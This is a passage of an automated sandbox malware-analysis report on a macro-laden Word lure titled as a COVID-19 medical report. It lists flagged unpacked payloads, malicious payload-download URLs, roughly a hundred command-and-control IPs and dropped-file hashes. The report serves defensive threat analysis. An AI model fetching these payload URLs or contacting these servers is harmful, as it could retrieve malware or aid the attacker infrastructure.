7.2.rundll32.exe.250000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
7.2.rundll32.exe.230000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
11.2.rundll32.exe.10000000.8.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
9.2.rundll32.exe.150000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
9.2.rundll32.exe.170000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
10.2.rundll32.exe.1a0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.700000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
10.2.rundll32.exe.10000000.12.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.10000000.12.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
12.2.rundll32.exe.160000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File

Domains

Source	Detection	Scanner	Link
vanddnabhargave.com	6%	Virustotal	Browse
ie-best.net	5%	Virustotal	Browse
bhaktivrind.com	2%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://cab.mykfn.com/admin/X/	100%	Avira URL Cloud	malware
http://bhaktivrind.com	0%	Avira URL Cloud	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://ie-best.net	0%	Avira URL Cloud	safe
http://java.c	0%	Avira URL Cloud	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://gocphongthe.com/wp-content/lMMC/	100%	Avira URL Cloud	malware
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://ie-best.net/online-timer-kvhxz/ilXL/	100%	Avira URL Cloud	malware
http://www.letscompareonline.com/de.letscompareonline.com/wYd/	100%	Avira URL Cloud	malware
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://bhaktivrind.com/cgi-bin/JBbb8/	100%	Avira URL Cloud	malware
http://vanddnabhargave.com/asset/W9o/	100%	Avira URL Cloud	malware
http://cab.mH	0%	Avira URL Cloud	safe
http://cab.mykfn.com	0%	Avira URL Cloud	safe
http://vanddnabhargave.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
vanddnabhargave.com	166.62.10.32	true	true	6%, Virustotal, Browse	unknown
ie-best.net	192.185.52.115	true	true	5%, Virustotal, Browse	unknown
bhaktivrind.com	166.62.28.130	true	true	2%, Virustotal, Browse	unknown
cab.mykfn.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ie-best.net/online-timer-kvhxz/ilXL/	true	Avira URL Cloud: malware	unknown
http://bhaktivrind.com/cgi-bin/JBbb8/	true	Avira URL Cloud: malware	unknown
http://vanddnabhargave.com/asset/W9o/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.windows.com/pctv.	rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmp	false		high
http://investor.msn.com	rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmp	false		high
http://ocsp.sectigo.com0	powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cab.mykfn.com/admin/X/	powershell.exe, 00000005.00000002.2107203332.000000001B538000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://bhaktivrind.com	powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://cambiasuhistoria.growlab.es/wp-content/hGhY2/P	powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp	false		high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	rundll32.exe, 00000006.00000002.2111927523.0000000001E57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110821787.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121763735.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131595672.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2146304517.0000000002197000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmp	false		high
http://ie-best.net	powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://java.c	powershell.exe, 00000005.00000002.2097432715.00000000003A5000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	rundll32.exe, 00000006.00000002.2111927523.0000000001E57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110821787.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121763735.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131595672.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2146304517.0000000002197000.00000002.00000001.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.icra.org/vocabulary/.	rundll32.exe, 00000006.00000002.2111927523.0000000001E57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110821787.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121763735.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131595672.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2146304517.0000000002197000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	powershell.exe, 00000005.00000002.2098069064.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2122352359.0000000002820000.00000002.00000001.sdmp	false		high
http://gocphongthe.com/wp-content/lMMC/	powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://investor.msn.com/	rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmp	false		high
http://cambiasuhistoria.growlab.es/wp-content/hGhY2/	powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp	false		high
http://www.letscompareonline.com/de.letscompareonline.com/wYd/	powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://sectigo.com/CPS0D	powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/cclea7	powershell.exe, 00000005.00000002.2097432715.00000000003A5000.00000004.00000020.sdmp	false		high
http://www.piriform.com/ccleaner	powershell.exe, 00000005.00000002.2097432715.00000000003A5000.00000004.00000020.sdmp	false		high
http://www.%s.comPA	powershell.exe, 00000005.00000002.2098069064.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2122352359.0000000002820000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://cab.mH	powershell.exe, 00000005.00000002.2106818585.0000000003B54000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cab.mykfn.com	powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://vanddnabhargave.com	powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
194.4.58.192	unknown	Kazakhstan	202958	HOSTER-KZ	true
49.205.182.134	unknown	India	18209	BEAMTELE-AS-APAtriaConvergenceTechnologiespvtltdIN	true
95.9.5.93	unknown	Turkey	9121	TTNETTR	true
185.201.9.197	unknown	Germany	47583	AS-HOSTINGERLT	true
115.94.207.99	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
71.72.196.159	unknown	United States	10796	TWC-10796-MIDWESTUS	true
70.92.118.112	unknown	United States	10796	TWC-10796-MIDWESTUS	true
70.183.211.3	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	true
12.175.220.98	unknown	United States	7018	ATT-INTERNET4US	true
200.116.145.225	unknown	Colombia	13489	EPMTelecomunicacionesSAESPCO	true
190.251.200.206	unknown	Colombia	13489	EPMTelecomunicacionesSAESPCO	true
138.68.87.218	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
172.105.13.66	unknown	United States	63949	LINODE-APLinodeLLCUS	true
220.245.198.194	unknown	Australia	7545	TPG-INTERNET-APTPGTelecomLimitedAU	true
104.131.11.150	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
162.241.204.233	unknown	United States	46606	UNIFIEDLAYER-AS-1US	true
176.111.60.55	unknown	Ukraine	24703	UN-UKRAINE-ASKievUkraineUA	true
24.178.90.49	unknown	United States	20115	CHARTER-20115US	true
94.23.237.171	unknown	France	16276	OVHFR	true
192.185.52.115	unknown	United States	46606	UNIFIEDLAYER-AS-1US	true
187.161.206.24	unknown	Mexico	11888	TelevisionInternacionalSAdeCVMX	true
41.185.28.84	unknown	South Africa	36943	GridhostZA	true
78.182.254.231	unknown	Turkey	9121	TTNETTR	true
194.190.67.75	unknown	Russian Federation	50804	BESTLINE-NET-PROTVINORU	true
108.53.88.101	unknown	United States	701	UUNETUS	true
186.74.215.34	unknown	Panama	11556	CableWirelessPanamaPA	true
109.116.245.80	unknown	Italy	30722	VODAFONE-IT-ASNIT	true
161.0.153.60	unknown	Haiti	27800	DigicelTrinidadandTobagoLtdTT	true
202.134.4.216	unknown	Indonesia	7713	TELKOMNET-AS-APPTTelekomunikasiIndonesiaID	true
120.150.218.241	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	true
202.134.4.211	unknown	Indonesia	7713	TELKOMNET-AS-APPTTelekomunikasiIndonesiaID	true
87.106.139.101	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
173.70.61.180	unknown	United States	701	UUNETUS	true
78.188.225.105	unknown	Turkey	9121	TTNETTR	true
74.128.121.17	unknown	United States	10796	TWC-10796-MIDWESTUS	true
62.75.141.82	unknown	Germany	8972	GD-EMEA-DC-SXB1DE	true
24.69.65.8	unknown	Canada	6327	SHAWCA	true
119.59.116.21	unknown	Thailand	56067	METRABYTE-TH453LadplacoutJorakhaebuaTH	true
37.139.21.175	unknown	Netherlands	14061	DIGITALOCEAN-ASNUS	true
98.109.133.80	unknown	United States	701	UUNETUS	true
95.213.236.64	unknown	Russian Federation	49505	SELECTELRU	true
46.105.131.79	unknown	France	16276	OVHFR	true
166.62.28.130	unknown	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true
50.116.111.59	unknown	United States	46606	UNIFIEDLAYER-AS-1US	true
188.165.214.98	unknown	France	16276	OVHFR	true
69.38.130.14	unknown	United States	26878	TWRS-NYCUS	true
120.150.60.189	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	true
172.125.40.123	unknown	United States	7018	ATT-INTERNET4US	true
180.222.161.85	unknown	Australia	45510	TELCOINABOX-AULevel109HunterStreetAU	true
110.145.11.73	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	true
172.86.188.251	unknown	Canada	32489	AMANAHA-NEWCA	true
157.245.99.39	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
115.21.224.117	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
167.114.153.111	unknown	Canada	16276	OVHFR	true
203.153.216.189	unknown	Indonesia	45291	SURF-IDPTSurfindoNetworkID	true
2.58.16.89	unknown	Latvia	64421	SERTEX-ASLV	true
62.171.142.179	unknown	United Kingdom	51167	CONTABODE	true
78.189.148.42	unknown	Turkey	9121	TTNETTR	true
85.105.205.77	unknown	Turkey	9121	TTNETTR	true
123.176.25.234	unknown	Maldives	7642	DHIRAAGU-MV-APDHIVEHIRAAJJEYGEGULHUNPLCMV	true
75.109.111.18	unknown	United States	19108	SUDDENLINK-COMMUNICATIONSUS	true
66.57.108.14	unknown	United States	11426	TWC-11426-CAROLINASUS	true
50.91.114.38	unknown	United States	33363	BHN-33363US	true
78.24.219.147	unknown	Russian Federation	29182	THEFIRST-ASRU	true
24.179.13.119	unknown	United States	20115	CHARTER-20115US	true
110.142.236.207	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	true
139.99.158.11	unknown	Canada	16276	OVHFR	true
190.103.228.24	unknown	Argentina	27983	RedIntercableDigitalSAAR	true
181.165.68.127	unknown	Argentina	10318	TelecomArgentinaSAAR	true
121.124.124.40	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
139.59.60.244	unknown	Singapore	14061	DIGITALOCEAN-ASNUS	true
61.19.246.238	unknown	Thailand	9335	CAT-CLOUD-APCATTelecomPublicCompanyLimitedTH	true
89.106.251.163	unknown	Russian Federation	5563	URALUralRegionalNetRU	true
168.235.67.138	unknown	United States	3842	RAMNODEUS	true
136.244.110.184	unknown	United States	20473	AS-CHOOPAUS	true
197.211.245.21	unknown	Mauritius	30969	ZOL-ASGB	true
79.130.130.240	unknown	Greece	6799	OTENET-GRAthens-GreeceGR	true
188.219.31.12	unknown	Italy	30722	VODAFONE-IT-ASNIT	true
75.113.193.72	unknown	United States	33363	BHN-33363US	true
217.20.166.178	unknown	Ukraine	1820	WNETUS	true
74.208.45.104	unknown	United States	8560	ONEANDONE-ASBrauerstrasse48DE	true
134.209.144.106	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
59.21.235.119	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
93.146.48.84	unknown	Italy	30722	VODAFONE-IT-ASNIT	true
139.162.60.124	unknown	Netherlands	63949	LINODE-APLinodeLLCUS	true
172.104.97.173	unknown	United States	63949	LINODE-APLinodeLLCUS	true
166.62.10.32	unknown	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true
69.49.88.46	unknown	United States	33734	MPW-MACHLINK-NETUS	true
24.164.79.147	unknown	United States	10796	TWC-10796-MIDWESTUS	true
74.58.215.226	unknown	Canada	5769	VIDEOTRONCA	true
37.187.72.193	unknown	France	16276	OVHFR	true
195.159.28.230	unknown	Norway	2116	ASN-CATCHCOMNO	true
51.89.36.180	unknown	France	16276	OVHFR	true
85.105.111.166	unknown	Turkey	9121	TTNETTR	true
190.240.194.77	unknown	Colombia	13489	EPMTelecomunicacionesSAESPCO	true
109.74.5.95	unknown	Sweden	43948	GLESYS-ASSE	true
79.137.83.50	unknown	France	16276	OVHFR	true
174.118.202.24	unknown	Canada	812	ROGERS-COMMUNICATIONSCA	true
181.171.209.241	unknown	Argentina	10318	TelecomArgentinaSAAR	true
89.216.122.92	unknown	Serbia	31042	SERBIA-BROADBAND-ASSerbiaBroadBand-SrpskeKablovskemreze	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	354471
Start date:	17.02.2021
Start time:	22:55:49
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	IU-8549 Medical report COVID-19.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDOC@20/8@6/100
EGA Information:	Successful, ratio: 85.7%
HDC Information:	Successful, ratio: 31.6% (good quality ratio 29.4%) Quality average: 70.8% Quality standard deviation: 26.8%
HCA Information:	Successful, ratio: 78% Number of executed functions: 21 Number of non-executed functions: 81
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Execution Graph export aborted for target powershell.exe, PID 1320 because it is empty Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
22:56:35	API Interceptor	1x Sleep call for process: msg.exe modified
22:56:36	API Interceptor	89x Sleep call for process: powershell.exe modified
22:56:56	API Interceptor	253x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
115.94.207.99	https://contentsxx.xsrv.jp/academia/parts_service/7xg/	Get hash	malicious	Browse	115.94.207.99:443/OUnj/nu5Sn5pH6W/XCxNN4goRNgqaQshv/BH9p/alZ3dnjhwqocs6Wj/
71.72.196.159	3Zn3npGt2R.doc	Get hash	malicious	Browse	71.72.196.159/jzbe8u/
	FILE-092020.doc	Get hash	malicious	Browse	71.72.196.159/Asgu9G/UPAJk1H/k1wB2h2IhMQGy9M4O/CwukNROTLhDmT5iz7yr/QNOGQRhP/
	X5w6zls.exe	Get hash	malicious	Browse	71.72.196.159/YmBvqXK/A1bXsLoMSYg/i0gaWBtL9c/yD6C9feh/
	#U5909#U531620.09.doc	Get hash	malicious	Browse	71.72.196.159/HisuDo3My4/
	#U5909#U531620-09.doc	Get hash	malicious	Browse	71.72.196.159/IEHZ5/HVlPRDwFoj/OuQtgxrIROu80/9t0syM1s3J/
	BCRYO2020.09.19.doc	Get hash	malicious	Browse	71.72.196.159/UdroxO4ouHCZo3/SPUpyAXBlZAJ/kR4LZr6qJHOM3/9tr1e4XNde6jxg22B/j2TVTGpcHCpnic1/
	drdgPfOU36.exe	Get hash	malicious	Browse	71.72.196.159/6YX6sQtKK6MLta/TbNsyU7EbVPMjL/0MoOi2xkKCNW7y67b/USvDoTSxSZ/BulSaK/
	cC.exe	Get hash	malicious	Browse	71.72.196.159/LLRDDCScx1Byk2D/krMwjOaF56Uc9Il6eMD/WuP6hJZcQa4/5p5T7L/
	#U304b#U3089#U306e#U5909#U66f419.doc	Get hash	malicious	Browse	71.72.196.159/3oAMQ7MNt66lIE8EI/DizHtXLtgQHqx/U2NH3hw0GWPotmCV/dMZCjcyGRF/qUw6hgI/FwMSWVK67N4mSEoC/
	LTB.doc	Get hash	malicious	Browse	71.72.196.159/QxJ68bj/OcYZ8J9RWfz7qwepeY/7Zys/K1Bpu/5CRfSZCJqSBtKcz/dhIXBeS6vLJR/
	#U6700#U65b0#U306e#U69cb#U9020#U56f3.doc	Get hash	malicious	Browse	71.72.196.159/JMk30NNrO1ReTb/6XR5dMIuJFNZfcR/yg0fR2fj6mXvduKb/
	HROF2020.doc	Get hash	malicious	Browse	71.72.196.159/EMc53XBYQbN5Jl/
	#U304b#U3089#U306e#U5909#U66f49#U6708.doc	Get hash	malicious	Browse	71.72.196.159/1ieklOTBS/ak8HNcj/
	DAT_2020_09_7444352632.doc	Get hash	malicious	Browse	71.72.196.159/cv2mWGF5/67dqj/ZkWPeQbBjvdWajsuvx/lYL2/TljK64Me1bfzHxBI/
	Dokumentation_FC_41232269.doc	Get hash	malicious	Browse	71.72.196.159/ejSg6gT/pSnsS3gAqTGFHUm9V/Jg8Kv3cnCG2Miq94/Sf9xZ/
	BIZ_18_09_2020_4070550449.doc	Get hash	malicious	Browse	71.72.196.159/tiVhuDLoHxS/G2H7AH/
	Betrag_2020_09_4036385628.doc	Get hash	malicious	Browse	71.72.196.159/RQWehX/fgtv5/htJbK7vQCVUSRwZJeE/
	SCNVS2020.09.doc	Get hash	malicious	Browse	71.72.196.159/b9v6oT61Mzfa1oQAP/IIlXlIMvsnl/
	ZZLEJDXT8LH-20200918.doc	Get hash	malicious	Browse	71.72.196.159/v4zRqawC6/myK9u1BaFBM0ak/
	#U5909#U531609_18.doc	Get hash	malicious	Browse	71.72.196.159/w5aqN3cMRoz5Eq/

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HOSTER-KZ	0217_1737094153981.doc	Get hash	malicious	Browse	185.100.65.29
	Hs52qascx.dll	Get hash	malicious	Browse	185.100.65.29
	0211_38602014674781.doc	Get hash	malicious	Browse	185.100.65.29
	0210_1723194332604.doc	Get hash	malicious	Browse	185.100.65.29
	Wh102yYa.dll	Get hash	malicious	Browse	185.100.65.29
	Wh102yYa.dll	Get hash	malicious	Browse	185.100.65.29
	0204_170387664101931.doc	Get hash	malicious	Browse	185.100.65.29
	0204_47091115550132.doc	Get hash	malicious	Browse	185.100.65.29
	Wh102yYa.dll	Get hash	malicious	Browse	185.100.65.29
	2e00000.dll	Get hash	malicious	Browse	185.100.65.29
	0fiasS.dll	Get hash	malicious	Browse	185.100.65.29
	6gdwwv.exe	Get hash	malicious	Browse	185.100.65.29
	0fiasS.dll	Get hash	malicious	Browse	185.100.65.29
	http://foodlike.kz/templates/QUJOpdohWbgqcRtXl3uAR0twmMS59eLk1cnA6P2oA15NZcjPZPj0GO2DF/	Get hash	malicious	Browse	185.98.5.123
	Offer10044885_BMElectricalWholesaleLtd._8_05_2020.xlsm	Get hash	malicious	Browse	185.98.7.168
	dWn0lheLfE.exe	Get hash	malicious	Browse	194.4.56.252
	Enpn2Assf0.exe	Get hash	malicious	Browse	194.4.56.252
	ttt.exe	Get hash	malicious	Browse	185.129.49.19
	http://vostok-avto.kz/robots.txt	Get hash	malicious	Browse	185.98.6.98
	hancitor.doc	Get hash	malicious	Browse	185.111.107.43
BEAMTELE-AS-APAtriaConvergenceTechnologiespvtltdIN	vrhiyc.exe	Get hash	malicious	Browse	183.82.229.11
	ucrcdh.exe	Get hash	malicious	Browse	183.82.229.11
	430#U0437.js	Get hash	malicious	Browse	49.207.1.12
	http://jimmyjohansson.net/3IMCCRNQ/SWIFT/US/	Get hash	malicious	Browse	183.82.101.78
	RZ_RN_8536339_24_08_2018.doc	Get hash	malicious	Browse	183.82.101.78
	RZ_RN_8536339_24_08_2018.doc	Get hash	malicious	Browse	183.82.101.78
	Invoice 0007699180.doc	Get hash	malicious	Browse	183.82.101.78
	Invoice 0007699180.doc	Get hash	malicious	Browse	183.82.101.78
	Invoice 0007699180.doc	Get hash	malicious	Browse	183.82.101.78
	Invoice 0007699180.doc	Get hash	malicious	Browse	183.82.101.78
	Invoice 0007699180.doc	Get hash	malicious	Browse	183.82.101.78
	Invoice 0007699180.doc	Get hash	malicious	Browse	183.82.101.78
	http://elista-gs.ru/doc/En_us/Invoice-receipt	Get hash	malicious	Browse	183.82.101.78
	culturemetagen.exe	Get hash	malicious	Browse	183.82.120.85
	jerseythunk.exe	Get hash	malicious	Browse	183.82.120.85
TTNETTR	Io8ic2291n.doc	Get hash	malicious	Browse	81.215.230.173
	yVn2ywuhEC.exe	Get hash	malicious	Browse	78.182.153.125
	oHqMFmPndx.exe	Get hash	malicious	Browse	78.181.200.182
	svchost.exe	Get hash	malicious	Browse	78.162.183.87
	34ArXmP6.exe	Get hash	malicious	Browse	95.12.26.17
	1Jx5JnUZW9.exe	Get hash	malicious	Browse	95.7.8.37
	nFZB1yk7r2.exe	Get hash	malicious	Browse	95.7.8.37
	utox.exe	Get hash	malicious	Browse	78.188.107.43
	sample2.dll	Get hash	malicious	Browse	78.161.228.73
	sample1.dll	Get hash	malicious	Browse	85.105.29.218
	CA1eebsu.exe	Get hash	malicious	Browse	81.215.78.147
	form.doc	Get hash	malicious	Browse	78.188.225.105
	December Invoice.doc	Get hash	malicious	Browse	78.188.225.105
	https://caminhodosveadeiros.com.br/h/Ld51n5yo2sVpA9ix2ZHZLqX7/	Get hash	malicious	Browse	78.188.225.105
	https://praticideas.net/wp-content/5nxk9R7pIxOAP8bYYojGh4Rl69ZT6uMTycnblB4OUEIzYvRuc22u0pyZbSvqTNlp7/	Get hash	malicious	Browse	78.188.225.105
	MH1809380042BB.doc	Get hash	malicious	Browse	78.188.225.105
	BL9908763287SF_10.doc	Get hash	malicious	Browse	78.188.225.105
	Form.doc	Get hash	malicious	Browse	78.188.225.105
	http://creationskateboards.com/satori_wheels_spencer_hamilton/WRLUbPer/	Get hash	malicious	Browse	78.188.225.105
	http://avanttipisos.com.br/catalogo-virtual/i1XnbBRzXXXrqGLfBZ3UNn6Yjh1mubdZKDm48wvQD3thzthxMysX	Get hash	malicious	Browse	78.188.225.105

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{452ACF7A-211A-44E2-8F1B-AC77A8685DB1}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.3555252507007245
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbO:IiiiiiiiiifdLloZQc8++lsJe1MzR
MD5:	9F85A426A7C06D286F10DC7B9C06FFF5
SHA1:	218864C86F0788C9CD71EF1505D3A38C522DEA07
SHA-256:	D4D1C027A1BAEF0AEDA2242980DBE4269FF390485C93C9FFE09AFFAC3D902044
SHA-512:	F09712C2E11AC9236A7FD6963E145D02F5238D5E3F37D75CCF4D4963B1D8F34C70727F620B81A708089349ECF6A30DFEBA20B2179E79FD103C17F53CABD8ED75
Malicious:	false
Reputation:	low
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B4FD77F3-97C0-4A14-814E-1968BCE52029}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
